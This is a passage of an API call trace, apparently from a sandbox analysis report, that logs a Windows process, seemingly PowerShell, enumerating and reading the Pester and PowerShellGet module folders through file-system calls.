lpBuffer=0xafa508dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0151.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e100) returned 1 [0151.961] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0xafa508e1e0 | out: lpFileInformation=0xafa508e1e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0151.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e0c0) returned 1 [0151.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e150) returned 1 [0151.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xafa508dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0151.962] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xafa508de60 | out: lpFindFileData=0xafa508de60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.963] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.963] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0151.963] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0151.963] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0151.963] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0151.964] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0151.965] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0151.965] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0151.965] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0151.965] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0151.965] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508de20 | out: lpFindFileData=0xafa508de20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.965] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e080) returned 1 [0151.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e040) returned 1 [0151.966] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0151.967] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0151.967] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0151.967] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0151.968] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0151.968] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0151.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.968] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.968] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0151.968] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5490 [0151.968] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.969] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0151.969] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.969] FindClose (in: hFindFile=0x2386d3b5490 | out: hFindFile=0x2386d3b5490) returned 1 [0151.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.969] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xafa508deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0151.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e300) returned 1 [0151.970] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e3e0 | out: lpFileInformation=0xafa508e3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0151.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e2c0) returned 1 [0151.971] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xafa508dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0151.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e0a0) returned 1 [0151.971] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x59c [0151.971] GetFileType (hFile=0x59c) returned 0x1 [0151.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e010) returned 1 [0151.971] GetFileType (hFile=0x59c) returned 0x1 [0151.971] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386d10*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0151.973] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386d10*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0151.973] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386d10*, lpNumberOfBytesRead=0xafa508e178*=0x1000, lpOverlapped=0x0) returned 1 [0151.974] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386d10*, lpNumberOfBytesRead=0xafa508e178*=0x5e5, lpOverlapped=0x0) returned 1 [0151.974] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386235, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386235*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0151.974] ReadFile (in: hFile=0x59c, lpBuffer=0x23800386d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e178, lpOverlapped=0x0 | out: lpBuffer=0x23800386d10*, lpNumberOfBytesRead=0xafa508e178*=0x0, lpOverlapped=0x0) returned 1 [0151.974] CloseHandle (hObject=0x59c) returned 1 [0151.977] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0151.977] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0151.977] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0151.977] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0151.977] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0151.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.977] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0151.977] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b47d0 [0151.979] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.979] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0151.979] FindNextFileW (in: hFindFile=0x2386d3b47d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.979] FindClose (in: hFindFile=0x2386d3b47d0 | out: hFindFile=0x2386d3b47d0) returned 1 [0151.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0151.980] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4a10 [0151.980] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.980] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0151.980] FindNextFileW (in: hFindFile=0x2386d3b4a10, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, 